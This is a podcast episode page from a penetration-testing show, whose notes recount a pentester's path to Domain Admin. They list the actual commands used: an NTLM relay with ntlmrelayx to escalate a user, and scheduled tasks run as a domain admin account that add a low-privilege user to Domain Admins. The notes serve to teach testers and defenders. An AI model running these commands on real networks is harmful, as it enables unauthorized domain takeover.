7MS #691: Tales of Pentest Pwnage – Part 75
No se pudo agregar al carrito
Solo puedes tener X títulos en el carrito para realizar el pago.
Add to Cart failed.
Por favor prueba de nuevo más tarde
Error al Agregar a Lista de Deseos.
Por favor prueba de nuevo más tarde
Error al eliminar de la lista de deseos.
Por favor prueba de nuevo más tarde
Error al añadir a tu biblioteca
Por favor intenta de nuevo
Error al seguir el podcast
Intenta nuevamente
Error al dejar de seguir el podcast
Intenta nuevamente
7MS #691: Tales of Pentest Pwnage – Part 75
-
Narrado por:
-
De:
Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? yes. Do I mean it? Yes. Here are all the commands/links to supplement today’s episode:
- Got an SA account to a SQL server through Snaffler-ing
- With that SA account, I learned how to coerce Web auth from within a SQL shell – read more about that here
- I relayed that Web auth with ntlmrelayx -smb2support -t ldap://dc --delegate-access --escalate-user lowpriv
- I didn’t have a machine account under my control, so I did SPNless RBCD on my lowpriv account – read more about that here
- Using that technique, I requested a host service ticket for the SQL box, then used evil-winrm to remote in using the ticket
- From there I checked out who had interactive logons: Get-Process -IncludeUserName explorer | Select-Object UserName
- Then I queued up a fake task to elevate me to DA: schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
- …and ran it: schtasks /run /tn "TotallyFineTask"
Todavía no hay opiniones